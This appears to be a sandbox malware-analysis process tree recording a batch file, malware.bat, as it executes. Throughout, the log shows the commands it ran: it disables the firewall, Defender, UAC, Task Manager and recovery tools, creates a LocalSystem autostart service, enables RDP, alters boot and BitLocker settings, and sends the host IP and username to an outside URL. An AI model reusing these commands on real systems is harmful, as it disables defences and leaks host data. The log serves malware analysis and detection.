C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
PID:5820 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
PID:4808 -
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
PID:5672 -
C:\Windows\system32\net.exenet start MiServicio2⤵PID:3800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵PID:5752
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3328 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2440
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5936
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5732
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4192
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "1⤵PID:2604
-
C:\Windows\system32\net.exenet session2⤵PID:1820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2212
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4968 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3960 -
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:6108 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:884 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
PID:4920 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
PID:5444 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
PID:3104 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
PID:3672 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
PID:5184 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵PID:4568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵PID:1228
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵PID:2656
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵PID:320
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵PID:1536
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵PID:2436
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵PID:5200
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵PID:5332
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵PID:5628
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:5604
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵PID:5516
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵PID:5716
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵PID:5772
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:4216
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:5556
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:5812
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:2892
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:5844
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:3132
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵PID:2000
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵PID:5704
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵PID:3836
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵PID:5804
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵PID:5304
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵PID:3852
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵PID:5572
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵PID:5152
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
PID:5532 -
C:\Windows\system32\findstr.exefindstr IPv43⤵PID:5148
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.2162⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5964 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb89147183⤵PID:4648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:23⤵PID:1328
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2396 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:83⤵PID:5492
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:13⤵PID:5008
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:13⤵PID:2748
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:83⤵PID:380
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4468 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:13⤵PID:1668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:13⤵PID:4436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:13⤵PID:3960
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:13⤵PID:1904
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:13⤵PID:2412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:13⤵PID:5320
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16598863121212721623,12939822433115313720,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:13⤵PID:4848
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵PID:4432
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5868 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin1232⤵PID:1244
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb89147183⤵PID:4836
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=yclextal\admin2⤵PID:1536
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x40,0x104,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb89147183⤵PID:4844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "Admin"2⤵PID:2064
-
C:\Windows\system32\net.exenet user "Admin"3⤵PID:2016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin"4⤵PID:928
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5840 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5804 -
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵PID:3164
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵PID:5108
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
PID:5148 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
PID:5880 -
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
PID:5232 -
C:\Windows\system32\net.exenet start MiServicio2⤵PID:3520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵PID:780
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"2⤵PID:5476
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"3⤵PID:5772
-
C:\Windows\system32\find.exefind "BackupProductKeyDefault"3⤵PID:1472
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=2⤵PID:5588
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb89147183⤵PID:5140
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4556
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5896
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat1⤵
- Modifies data under HKEY_USERS
PID:2556 -
C:\Windows\system32\net.exenet session2⤵PID:3080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:5972
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5660 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4556 -
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:764 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
PID:5848 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
PID:5624 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
PID:4932 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:5520 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
PID:2412 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵PID:5756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵PID:996
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵PID:4968
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵PID:6032
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵PID:5588
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵PID:1216
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵PID:676
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵PID:5304
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵PID:4932
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵PID:708
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵PID:4924
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:5500
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵PID:2216
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵PID:2444
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵PID:4968
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:5476
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:4452
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:5776
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1216
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵PID:5600
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:1480
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:3248
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵PID:4924
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵PID:5852
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵PID:2216
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5756
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵PID:1472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4968
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵PID:6112
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵PID:5272
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵PID:5196
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵PID:1664
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
PID:4200 -
C:\Windows\system32\findstr.exefindstr IPv43⤵PID:5520
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵PID:5704
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "YCLEXTAL$"2⤵PID:5412
-
C:\Windows\system32\net.exenet user "YCLEXTAL$"3⤵PID:5204
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4848 -
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5160 -
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵PID:1768
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵PID:5544
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
